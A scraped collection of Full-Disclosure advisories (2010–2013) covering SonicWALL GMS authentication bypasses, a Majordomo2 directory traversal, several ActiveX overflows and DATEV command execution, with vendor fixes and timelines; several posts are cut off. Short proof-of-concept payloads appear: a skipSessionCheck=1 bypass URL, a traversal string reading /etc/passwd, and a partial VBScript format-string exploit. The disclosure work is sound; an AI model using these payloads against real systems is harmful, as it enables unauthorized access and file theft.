[Full-disclosure] NSOADV-2013-001: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)
__ -- NSOADV-2013-001 --- SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/) __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/) Severity: Critical CVE-ID: CVE-2013-1359 CVSS Base Score:10 Impact:10 Exploitability:10 CVSS2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C Advisory ID:NSOADV-2013-001 Found Date: 2012-04-26 Date Reported: 2012-12-13 Release Date: 2013-01-17 Author: Nikolas Sotiriu Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2013-001.txt Vendor: DELL SonicWALL (http://www.sonicwall.com/) Affected Products: GMS Analyzer UMA ViewPoint Affected Platforms: Windows/Linux Affected Versions: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Background: === The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster configuration. (Product description from Website) Description: DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that allows an unauthenticated, remote attacker to bypass the Web interface authentication offered by the affected product. The vulnerability is attributed to a built-in function to skip the session check of the web application. An attacker may exploit this vulnerability by sending a request to the UMA Interface (/appliance/) with the parameter skipSessionCheck=1. The attacker gains full administrative access to the interface and could execute code with root or SYSTEM permissions, which leads to a full compromisation of the system. Proof of Concept: = http://host/appliance/applianceMainPage?action=statusskipSessionCheck=1 The remote Root/System exploit
[Full-disclosure] NSOADV-2013-002: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)
__ -- NSOADV-2013-002 --- SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/) Severity: Critical CVE-ID: CVE-2013-1360 CVSS Base Score:9 Impact:8.5 Exploitability:10 CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C Advisory ID:NSOADV-2013-002 Found Date: 2012-04-26 Date Reported: 2012-12-13 Release Date: 2013-01-17 Author: Nikolas Sotiriu Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2013-002.txt Vendor: DELL SonicWALL (http://www.sonicwall.com/) Affected Products: GMS Analyzer UMA ViewPoint Affected Platforms: Windows/Linux Affected Versions: GMS/Analyzer/UMA 7.0.x GMS/ViewPoint/UMA 6.0.x GMS/ViewPoint/UMA 5.1.x GMS/ViewPoint 5.0.x GMS/ViewPoint 4.1.x Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Background: === The SonicWALL® Global Management System (GMS) provides organizations, distributed enterprises and service providers with a powerful and intuitive solution to centrally manage and rapidly deploy SonicWALL firewall, anti-spam, backup and recovery, and secure remote access solutions. Flexibly deployed as software, hardware, or a virtual appliance, SonicWALL GMS offers centralized real-time monitoring, and comprehensive policy and compliance reporting. For enterprise customers, SonicWALL GMS streamlines security policy management and appliance deployment, minimizing administration overhead. Service Providers can use GMS to simplify the security management of multiple clients and create additional revenue opportunities. For added redundancy and scalability, GMS can be deployed in a cluster configuration. (Product description from Website) Description: DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that allows an unauthenticated, remote attacker to bypass the Web interface authentication offered by the affected product. The vulnerability is attributed to a broken session handling in the process of password change process of the web application. changing in the web application. An attacker may exploit this vulnerability by sending a specially crafted request to the SGMS Interface (/sgms/). The attacker gains full administrative access to the interface and full control over all managed appliances, which could lead to a full compromisation of the organisation. Proof of Concept : == Access the following URL to login to the sgms interface: http://host/sgms/auth
[Full-disclosure] NSOADV-2011-003: Majordomo2 'help' Command Directory Traversal (Patch Bypass)
__ -- NSOADV-2011-003 --- Majordomo2 'help' Command Directory Traversal (Patch Bypass) __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: Majordomo2 'help' Command Directory Traversal Severity: Medium Advisory ID:NSOADV-2011-003 CVE:CVE-2011-0063 Found Date: 03.02.2011 Date Reported: 03.02.2011 Release Date: 19.02.2011 Author: Nikolas Sotiriu Mail: nso-research at sotiriu.de Website:http://sotiriu.de/ Twitter:http://twitter.com/nsoresearch Advisory-URL: http://sotiriu.de/adv/NSOADV-2011-003.txt Vendor/Project: http://www.mj2.org/ Affected Products: majordomo2 = 20110203 Remote Exploitable: Yes Local Exploitable: No Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: === Majordomo 2 is an upwardly-compatible rewrite of the popular majordomo mailing list manager software by Jason Tibbitts and Michael Yount. Description: Majordomo2 = 20110203 is affected by a Directory Traversal vulnerability due to parameter 'extra' of the 'help' command in the function '_list_file_get()' is not properly sanitized. The original bug was made public on 03.02.2011 by Michael Brooks of sitewat.ch: https://sitewat.ch/en/Advisory/View/1 https://bugzilla.mozilla.org/show_bug.cgi?id=628064 I discovered, that the patch, which is in the CVS since version 20110125 don't protect against the Directory Traversal bug. https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 The diff build in the regex '$file =~ s!/?\.\./?!!g;', which deletes '../' from $file. Bypassing this regex is quiet simple by using './.../' insted '../'. Proof of Concept : == HTTP: http://target/cgi-bin/mj_wwwusr?passw=list=GLOBALuser=func=help extra=./..././..././..././..././..././..././..././.../etc/passwd SMTP: help ./..././..././..././..././..././..././..././.../etc/passwd Solution: = Update to Majordomo2 = 20110204 http://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz References: === Sitewatch Advisory: https://sitewat.ch/en/Advisory/View/1 Original Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064 Patch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307 Disclosure Timeline (/MM/DD): = 2011.02.03: Patch bypass vulnerability found 2011.02.03: Informed security [at] mozilla.org 2011.02.03: Mozilla opend Bug 631307 in bugzilla 2011.02.03: Jason Tibbitts comitted a fix (Sorry again) 2011.02.04: Snapshot available for download 2011.02.04: Discuss the public disclosure 2011.03.04: Got the Bug Bounty Money 2011.03.08: Release of Advisory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure
[Full-disclosure] NSOADV-2010-005: SonicWALL E-Class SSL-VPN ActiveX Control format string overflow
__
-- NSOADV-2010-005 ---
SonicWALL E-Class SSL-VPN ActiveX Control format string overflow
__
__
0
1 00110 0011000
11 01 01 1 10
1 0 11 01 0 11 1 1 111011001
101 1 11 0110111 110
1001 0 1 10 11 0 10 11 111 1 111 111001
1 0 10 0 11 11 1 1 1101 10
00111 0 0 11 00 0 1110 1 10111 111 11 100
1011 0 01 0 1 1 10 11 1 011
00 0110 1110 1 0 11101011 11100 00
0 0 10 1110 1 01 1 1101 01
01110 0 10 10 110 0 111010101
11 11 0 0 1 1 1 1 1101 111
10110 10 010 1 0 0 1 110
111 1 1 1 111 1 10011 10110 0 1100
111 10 110 10100010 111 11 0011100
11 10 001100 0001 11 10 11 0
0 00100 1 10 1 101010001
111010 1011 100100 111001101 0
0110 111011011 0110 10001101 0
1011 1 10 101 0101 00
1010 1 11001 1 1101 10
110101011 0 101 0
11011
111
__
__
Title: SonicWALL E-Class SSL-VPN ActiveX Control
format string overflow
Severity: High
Advisory ID:NSOADV-2010-005
Found Date: 22.02.2010
Date Reported: 09.06.2010
Release Date: 19.08.2010
Author: Nikolas Sotiriu
Website:http://sotiriu.de
Twitter:http://twitter.com/nsoresearch
Mail: nso-research at sotiriu.de
URL:http://sotiriu.de/adv/NSOADV-2009-005.txt
Vendor: SonicWALL (http://www.sonicwall.com/)
Affected Products: SonicWALL SRA EX1600
SonicWALL EX7000
SonicWALL EX6000
SonicWALL EX-1600
SonicWALL EX-1500
SonicWALL EX-750
Affected Versions: 10.0.4 and all previous versions
10.5.1 without hotfix
Remote Exploitable: Yes
Local Exploitable: No
Patch Status: Vendor released a patch
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy
Background:
===
SonicWALL has added the award-winning Aventail SSL VPN product line to
our E-Class SRA appliances. Aventail's best-of-breed SSL VPNs deliver
secure remote access to the most resources from the most end point
locations. Aventail was named in the Visionaries Quadrant in the SSL
VPN Magic Quadrant Report from Gartner, considered to be the leading
analyst firm covering the SSL VPN industry.
(Product description from Website)
Description:
Remote exploitation of a format string overflow vulnerability in the
End-Point Interrogator/Installer ActiveX Control could allow an attacker
to execute arbitrary code within the security context of the targeted
user.
The affected function is AuthCredential. The functions
ConfigurationString seems to be also vulnerable, but the format
string has to be base64 decoded.
Name: End-Point Interrogator/Installer Module
Vendor: Aventail Corporation
Type: ActiveX-Control
Version: 10.3.42
Prog ID: EPILib.EPInterrogator
GUID: {2A1BE1E7-C550-4D67-A553-7F2D3A39233D}
File: epi.dll
Folder: %userprofile%\Application Data\Aventail\epi
Safe for Script: True
Safe for Init:True
Proof of Concept :
==
html
head
titleSonicWALL E-Class SSL-VPN ActiveX Control DoS PoC/title
/head
body
pre
img src=http://sotiriu.de/images/logo_wh_80.png;
input type=button name=Submit VALUE=Rule #5 – Shoot First
/pre
object classid='clsid:2A1BE1E7-C550-4D67-A553-7F2D3A39233D'
id='obj'/object
script language='vbscript'
Sub Submit_OnClick
eax=String(2, unescape(%u6161))
arg=%1862x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n
[Full-disclosure] NSOADV-2010-008: AnNoText Third-Party ActiveX Control Buffer Overflow
__
-- NSOADV-2010-008 ---
AnNoText Third-Party ActiveX Control Buffer Overflow
__
__
0
1 00110 0011000
11 01 01 1 10
1 0 11 01 0 11 1 1 111011001
101 1 11 0110111 110
1001 0 1 10 11 0 10 11 111 1 111 111001
1 0 10 0 11 11 1 1 1101 10
00111 0 0 11 00 0 1110 1 10111 111 11 100
1011 0 01 0 1 1 10 11 1 011
00 0110 1110 1 0 11101011 11100 00
0 0 10 1110 1 01 1 1101 01
01110 0 10 10 110 0 111010101
11 11 0 0 1 1 1 1 1101 111
10110 10 010 1 0 0 1 110
111 1 1 1 111 1 10011 10110 0 1100
111 10 110 10100010 111 11 0011100
11 10 001100 0001 11 10 11 0
0 00100 1 10 1 101010001
111010 1011 100100 111001101 0
0110 111011011 0110 10001101 0
1011 1 10 101 0101 00
1010 1 11001 1 1101 10
110101011 0 101 0
11011
111
__
__
Title: AnNoText Third-Party ActiveX Control Buffer
Overflow
Severity: Critical
Advisory ID:NSOADV-2010-008
Found Date: 18.03.2010
Date Reported: 25.03.2010
Release Date: 11.06.2010
Author: Nikolas Sotiriu
Mail: nso-research at sotiriu.de
Website:http://sotiriu.de/
Twitter:http://twitter.com/nsoresearch
Advisory-URL: http://sotiriu.de/adv/NSOADV-2010-008.txt
Vendor: AnNoText (http://www.annotext.de/)
Affected Products: ADVOAkte 17 Build 4.8.0.116 Patchlevel 034
Affected Component: KEYHELPLib ActiveX Control V.1.1.2200.0
Remote Exploitable: Yes
Local Exploitable: No
Patch Status: unknown (No response from vendor)
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy
Background:
===
AnNoText is a German Company, which makes Software for lawyers.
Description:
During the installation of the ADVOAkte an ActiveX Control will be
installed (keyhelp.ocx), in which multiple functions are vulnerable to a
buffer oveflow bugs, which could lead to a remote code execution.
Registered Classes:
+--
Name: KeyPopup Class
Vendor: KeyWorks Software
Type: ActiveX-Control
Version: 1.1.2200.0
GUID: {1E57C6C4-B069-11D3-8D43-00104B138C8C}
File: keyhelp.ocx
Folder: C:\WINDOWS\system32\
Safe for Script: True
Safe for Init:False
Name: KeyScript Class
Vendor: KeyWorks Software
Type: ActiveX-Control
Version: 1.1.2200.0
GUID: {45E66957-2932-432A-A156-31503DF0A681}
File: keyhelp.ocx
Folder: C:\WINDOWS\system32\
Safe for Script: True
Safe for Init:False
Name: KeyHelp Embedded Window
Vendor: KeyWorks Software
Type: ActiveX-Control
Version: 1.1.2200.0
GUID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
File: keyhelp.ocx
Folder: C:\WINDOWS\system32\
Safe for Script: True
Safe for Init:True
Proof of Concept :
==
http://sotiriu.de/software/NSOPOC-2010-008.zip
(coming soon)
Solution:
=
Disable the vulnerable ActiveX Control by setting the kill bit for the
following CLSID:
{1E57C6C4-B069-11D3-8D43-00104B138C8C}
{45E66957-2932-432A-A156-31503DF0A681}
{B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
Save the following text as a .REG file and imported to set the kill bit
for this controls:
+--
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{1E57C6C4-B069-11D3-8D43-00104B138C8C}]
Compatibility Flags=dword:0400
[Full-disclosure] NSOADV-2010-009: AnNoText Third-Party ActiveX Control file overwrite vulnerability
__
-- NSOADV-2010-009 ---
AnNoText Third-Party ActiveX Control file overwrite vulnerability
__
__
0
1 00110 0011000
11 01 01 1 10
1 0 11 01 0 11 1 1 111011001
101 1 11 0110111 110
1001 0 1 10 11 0 10 11 111 1 111 111001
1 0 10 0 11 11 1 1 1101 10
00111 0 0 11 00 0 1110 1 10111 111 11 100
1011 0 01 0 1 1 10 11 1 011
00 0110 1110 1 0 11101011 11100 00
0 0 10 1110 1 01 1 1101 01
01110 0 10 10 110 0 111010101
11 11 0 0 1 1 1 1 1101 111
10110 10 010 1 0 0 1 110
111 1 1 1 111 1 10011 10110 0 1100
111 10 110 10100010 111 11 0011100
11 10 001100 0001 11 10 11 0
0 00100 1 10 1 101010001
111010 1011 100100 111001101 0
0110 111011011 0110 10001101 0
1011 1 10 101 0101 00
1010 1 11001 1 1101 10
110101011 0 101 0
11011
111
__
__
Title: AnNoText Third-Party ActiveX Control file
overwrite vulnerability
Severity: Low
Advisory ID:NSOADV-2010-009
Found Date: 18.03.2010
Date Reported: 25.03.2010
Release Date: 11.06.2010
Author: Nikolas Sotiriu
Mail: nso-research at sotiriu.de
Website:http://sotiriu.de/
Twitter:http://twitter.com/nsoresearch
Advisory-URL: http://sotiriu.de/adv/NSOADV-2010-009.txt
Vendor: AnNoText (http://www.annotext.de/)
Affected Products: ADVOMahn Edition 21
Affected Components IDAutomation Linear BarCode V.1.6.0.6
IDautomation PDF417 Barcode V.1.6.0.6
Remote Exploitable: Yes
Local Exploitable: No
Patch Status: unknown (No response from vendor)
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy
Background:
===
AnNoText is a German Company, which makes Software for lawyers.
Description:
During the installation of the ADVOMahn two ActiveX Control will be
installed (IDAutomationLinear6.dll and IDAutomationPDF417_6.dll), in
which the functions SaveBarCode and SaveEnhWMF can lead to a file
overwrite bug.
Controls:
+
Name: IDAutomation Linear BarCode 1.606
Vendor: IDAutomation.com Inc.
Type: ActiveX-Control
Version: 1.6.0.6
GUID: {0C3874AA-AB39-4B5E-A768-45F3CE6C6819}
File: IDAutomationLinear6.dll
Folder: C:\WINDOWS\system32\
Safe for Script: True
Safe for Init:True
Name: IDautomation PDF417 Barcode
Vendor: IDAutomation.com Inc.
Type: ActiveX-Control
Version: 1.6.0.6
GUID: {E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}
File: IDAutomationPDF417_6.dll
Folder: C:\WINDOWS\system32\
Safe for Script: True
Safe for Init:True
Proof of Concept :
==
http://sotiriu.de/software/NSOPOC-2010-009.zip
(coming soon)
Solution:
=
Disable the vulnerable ActiveX Control by setting the kill bit for the
following CLSID:
{0C3874AA-AB39-4B5E-A768-45F3CE6C6819}
{E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}
Save the following text as a .REG file and imported to set the kill bit
for this controls:
+--
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{0C3874AA-AB39-4B5E-A768-45F3CE6C6819}]
Compatibility Flags=dword:0400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}]
Compatibility Flags=dword:0400
+--
More information about how to set the kill bit is available
[Full-disclosure] Security contact SonicWALL
Anybody knows the security contact for SonicWALL? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NSOADV-2010-006: Authentium Command Free Scan ActiveX Control buffer overflow
__
-- NSOADV-2010-006 ---
Authentium Command Free Scan ActiveX Control buffer overflow
__
__
0
1 00110 0011000
11 01 01 1 10
1 0 11 01 0 11 1 1 111011001
101 1 11 0110111 110
1001 0 1 10 11 0 10 11 111 1 111 111001
1 0 10 0 11 11 1 1 1101 10
00111 0 0 11 00 0 1110 1 10111 111 11 100
1011 0 01 0 1 1 10 11 1 011
00 0110 1110 1 0 11101011 11100 00
0 0 10 1110 1 01 1 1101 01
01110 0 10 10 110 0 111010101
11 11 0 0 1 1 1 1 1101 111
10110 10 010 1 0 0 1 110
111 1 1 1 111 1 10011 10110 0 1100
111 10 110 10100010 111 11 0011100
11 10 001100 0001 11 10 11 0
0 00100 1 10 1 101010001
111010 1011 100100 111001101 0
0110 111011011 0110 10001101 0
1011 1 10 101 0101 00
1010 1 11001 1 1101 10
110101011 0 101 0
11011
111
__
__
Title: Authentium Command On Demand ActiveX Control
Buffer Overflow
Severity: High
Advisory ID:NSOADV-2010-006
Found Date: 15.02.2010
Date Reported: 22.02.2010
Release Date: 04.03.2010
Author: Nikolas Sotiriu
Website:http://sotiriu.de
Twitter:http://twitter.com/nsoresearch
Mail: nso-research at sotiriu.de
URL:http://sotiriu.de/adv/NSOADV-2009-006.txt
Vendor: Authentium (http://www.authentium.com/)
Affected Products: Authentium Command On Demand Online Scan
(http://www.commandondemand.com/)
Affected Component: CSS Web Installer ActiveX V.1.4.9508.605
Remote Exploitable: Yes
Local Exploitable: No
Patch Status: No Patch (See Solution)
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy
Background:
===
Authentium Command On Demand is a highly-effective, totally free virus
scanner. Command on Demand scans for more than half a million Internet
threats, using definition files that are updated daily
(Product description from Website)
Description:
Remote exploitation of a buffer overflow vulnerability in Authentium
Command On Demand Online scanner service could allow an attacker to
execute arbitrary code within the security context of the targeted user.
The affected function is InstallProduct1. The functions
InstallProduct and InstallProduct2 seems to be also vulnerable.
Name: CSS Web Installer Class
Vendor: Authentium, Inc.
Type: ActiveX-Control
Version: 1.4.9508.605
Prog ID: CSSWEBLib.Installer
GUID: {6CCE3920-3183-4B3D-808A-B12EB769DE12}
File: cssweb.dll
Folder: C:\WINDOWS\Downloaded Program Files\
Safe for Script: True
Safe for Init:True
IObjectSafety:False
Proof of Concept :
==
http://sotiriu.de/software/NSOPOC-2010-006.zip
Solution:
=
Product is no longer supported.
Disable the vulnerable ActiveX Control by setting the kill bit for the
following CLSID:
{6CCE3920-3183-4B3D-808A-B12EB769DE12}
Save the following text as a .REG file and imported to set the kill bit
for this control:
+--
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{6CCE3920-3183-4B3D-808A-B12EB769DE12}]
Compatibility Flags=dword:0400
+--
More information about how to set the kill bit is available in Microsoft
Support Document 240797 (http://support.microsoft.com/kb/240797).
Disclosure Timeline (/MM/DD):
=
2010.02.15: Vulnerability found
2010.02.22
[Full-disclosure] NSOADV-2010-004: McAfee LinuxShield remote/local code execution
__ NSOADV-2010-004: McAfee LinuxShield remote/local code execution __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: McAfee LinuxShield remote/local code execution Severity: Medium Advisory ID:NSOADV-2010-004 Found Date: 07.12.2009 Date Reported: 05.02.2010 Release Date: 02.03.2010 Author: Nikolas Sotiriu (lofi) Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2010-004.txt Vendor: McAfee (http://www.mcafee.com/) Affected Products: McAfee LinuxShield = 1.5.1 Not Affected Products: McAfee LinuxShield 1.5.1 with HF550192 Remote Exploitable: Yes (attacker must be authenticated) Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Thanks to: Thierry Zoller: For the permission to use his Policy Background: === LinuxShield detects and removes viruses and other potentially unwanted software on Linux-based systems. LinuxShield uses the powerful McAfee scanning engine — the engine common to all our anti-virus products. Although a few years ago, the Linux operating system was considered a secure environment, it is now seeing more occurrences of software specifically written to attack or exploit security weaknesses in Linux-based systems. Increasingly, Linux-based systems interact with Windows-based computers. Although viruses written to attack Windows- based systems do not directly attack Linux systems, a Linux server can harbor these viruses, ready to infect any client that connects to it. When installed on your Linux systems, LinuxShield provides protection against viruses, Trojan horses, and other types of potentially unwanted software. LinuxShield scans files as they are opened and closed — a technique known as on-access scanning. LinuxShield also incorporates an on-demand scanner that enables you to scan any directory or file in your host at any time. When kept up-to-date with the latest virus-definition (DAT) files, LinuxShield is an important part of your network security. We recommend that you set up an anti-virus security policy for your network, incorporating as many protective measures as possible. LinuxShield uses a web-browser interface, and a large number of LinuxShield installations can be centrally controlled by ePolicy Orchestrator. (Product description from LinuxShield Product Guide) Description: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of McAfee LinuxShield. User interaction is not required to exploit this vulnerability but an attacker must be authenticated. The LinuxShield Webinterface communicates with the localy installed nailsd daemon, which listens on port 65443/tcp, to do configuration changes, query the configuration and execute tasks. Each user, which can login to the victim box, can also authenticate it self
[Full-disclosure] NSOADV-2010-003: DATEV ActiveX Control remote command execution
__
NSOADV-2010-003: DATEV ActiveX Control remote command execution
__
__
0
1 00110 0011000
11 01 01 1 10
1 0 11 01 0 11 1 1 111011001
101 1 11 0110111 110
1001 0 1 10 11 0 10 11 111 1 111 111001
1 0 10 0 11 11 1 1 1101 10
00111 0 0 11 00 0 1110 1 10111 111 11 100
1011 0 01 0 1 1 10 11 1 011
00 0110 1110 1 0 11101011 11100 00
0 0 10 1110 1 01 1 1101 01
01110 0 10 10 110 0 111010101
11 11 0 0 1 1 1 1 1101 111
10110 10 010 1 0 0 1 110
111 1 1 1 111 1 10011 10110 0 1100
111 10 110 10100010 111 11 0011100
11 10 001100 0001 11 10 11 0
0 00100 1 10 1 101010001
111010 1011 100100 111001101 0
0110 111011011 0110 10001101 0
1011 1 10 101 0101 00
1010 1 11001 1 1101 10
110101011 0 101 0
11011
111
__
__
Title: DATEV DVBSExeCall ActiveX Control remote
command execution
Severity: Critical
Advisory ID:NSOADV-2010-003
CVE Number: CVE-2010-0689
Found Date: 11.01.2010
Date Reported: 28.01.2010
Release Date: 25.02.2010
Author: Nikolas Sotiriu
Mail: nso-research at sotiriu.de
Website:http://sotiriu.de/
Twitter:http://twitter.com/nsoresearch
Advisory-URL: http://sotiriu.de/adv/NSOADV-2010-003.txt
Vendor: DATEV (http://www.datev.de/)
Affected Products: DATEV Base System (Grundpaket Basis)
Affected Component: DVBSExeCall Control ActiveX Control V.1.0.0.1
Remote Exploitable: Yes
Local Exploitable: No
Patch Status: Vendor released a patch (See Solution)
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy
Background:
===
DATEV eG is a German Company, which makes Software for tax advisors and
lawyers.
The affected Base System has to be installed on all systems that
need DATEV Software.
Description:
During the installation of the DATEV Base System (Grundpaket Basis) an
ActiveX Control will be installed (DVBSExeCall.ocx), in which the
function ExecuteExe is vulnerable to a command execution bug.
Name: ActiveX-Control zum Öffnen von LEXinform und der InfoDB
Vendor: DATEV eG
Type: ActiveX-Steuerelement
Version: 1.0.0.1
GUID: {C1CF8B56-3147-41A2-B9BF-79437EED7AFC}
File: DVBSExeCall.ocx
Folder: C:\DATEV\PROGRAMM\HLPDVBS\
Safe for Script: True
Safe for Init:True
IObjectSafety:False
NOTE: The affected ActiveX Control will be installed by any DATEV
Software, so each system with a DATEV installation is vulnerable.
Proof of Concept :
==
Weaponized PoC demonstration video:
+--
http://sotiriu.de/demos/videos/nso-2010-003.html
Solution:
=
DATEV Advisory
+-
http://www.datev.de/info-db/1080162 (German)
Service-Release Paket V. 1.0
+---
http://www.datev.de/portal/ShowPage.do?pid=dpinid=96550
Disclosure Timeline (/MM/DD):
=
2010.01.11: Vulnerability found
2010.01.25: Initial contact per Online forms
2010.01.26: Initial vendor response
2010.01.26: Ask for a PGP Key and send the Disclosure Policy to vendor.
[-] No Response
2010.01.28: Ask if vendor received my last email.
2010.01.28: Vendor is unable to use PGP.
2010.01.28: Sent PoC, Advisory, Disclosure policy and planned disclosure
date (2010.02.11) to Vendor
2010.01.29: Vendor acknowledges the reception of the advisory and start
to develop a patch.
2010.02.02: Patch is finished. Vendor wishes to delay the release
[Full-disclosure] [UPDATE] NSOADV-2010-001: Panda Security Local Privilege Escalation
